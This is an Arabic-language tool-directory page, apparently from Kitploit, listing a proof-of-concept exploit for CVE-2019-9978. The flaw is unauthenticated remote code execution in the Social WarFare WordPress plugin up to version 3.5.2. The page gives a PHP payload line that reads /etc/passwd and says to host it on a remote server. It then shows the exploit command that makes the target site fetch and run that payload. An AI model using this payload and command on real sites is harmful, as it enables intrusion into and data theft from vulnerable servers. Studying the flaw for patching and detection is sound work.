Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-9978 — CVE-2019-9978 - (PoC) RCE في إضافة Social WarFare (<=3.5.2) | Kitploit
أدوات/GitHubGitHub/hash3lizer/cve-2019-9978
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubhash3lizer/cve-2019-9978

CVE-2019-9978

CVE-2019-9978 - (PoC) RCE في إضافة Social WarFare (<=3.5.2)

عرض المستودع
228منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-9978

CVE-2019-9978 - (PoC) RCE في إضافة Social WarFare (<=3.5.2)

الوصف

تم اكتشاف تنفيذ تعليمات برمجية عن بُعد غير مصدق عليه في وظيفة معالجة استيراد الإعدادات. يمكن للمستخدم استغلال RFI للوصول إلى RCE.

إثبات المفهوم

انسخ الحمولة التالية:

root@kitploit:~
<pre>system('cat /etc/passwd')</pre>

احفظها باسم الملف: payload.txt ثم ارفعها على خادم. يجب أن يبدو الرابط على الشكل: http(s)://yoursite.com/payload.txt. أخيرًا، زود الخيارين --target و --payload-uri:

root@kitploit:~
$ python cve-2019-9978.py --target http://vulntarget.com \
                         --payload-uri http://yourpayloadsite.com/payload.txt

Screenshot at 2019-05-03 11-15-02

الاعتمادات

الباحث: Luka Sikic
الرابط: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
المؤلف: @hash3liZer

تنزيل الأداة